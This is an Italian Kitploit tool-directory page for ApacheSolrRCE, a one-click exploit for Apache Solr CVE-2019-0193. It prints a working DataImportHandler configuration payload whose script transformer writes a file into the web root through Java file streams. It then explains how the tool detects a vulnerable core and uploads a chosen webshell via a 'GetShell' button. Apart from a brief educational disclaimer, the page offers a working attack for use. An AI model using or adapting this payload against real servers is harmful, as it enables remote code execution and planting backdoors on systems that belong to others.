Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ApacheSolrRCE — ApacheSolrRCE(CVE-2019-0193)per scrivere una shell con un clic, il principio è scrivere un backdoor tramite flusso di file Java eseguito dal codice. | Kitploit
Strumenti/GitHubGitHub/freefv/apachesolrrce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE(CVE-2019-0193)per scrivere una shell con un clic, il principio è scrivere un backdoor tramite flusso di file Java eseguito dal codice.

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dichiarazione del progetto

Solo per scopi educativi e di scambio sulla sicurezza informatica, non utilizzare per test o attacchi illegali.

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) shell in un clic, il principio è quello di scrivere un webshell tramite un flusso di file Java eseguito tramite codice.

Nota: l'autore è piuttosto inesperto, se trovi bug o hai altre esigenze, scarica il codice e modificalo tu stesso.

Descrizione dello strumento

Poiché i payload diffusi su Internet sono tutti esecuzione di comandi e non è conveniente caricare un webshell, ho scritto questo payload (quando restituisce 123456, significa che la scrittura è riuscita).

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

Utilizzo dello strumento

Prima fare clic su 'Rilevamento' per ottenere il core e verificare se esiste una vulnerabilità.

Quindi fare clic su 'GetShell' per procedere.

Nota: posiziona il tuo webshell nella directory 'shell', lo strumento caricherà automaticamente il tuo webshell nel menu a discesa.

Il proxy predefinito è HTTP, sulla porta 8080, è hardcoded nel codice; se necessario, compila e modifica da soli.

Ringraziamenti speciali

solr_exploit

Scarica lo strumento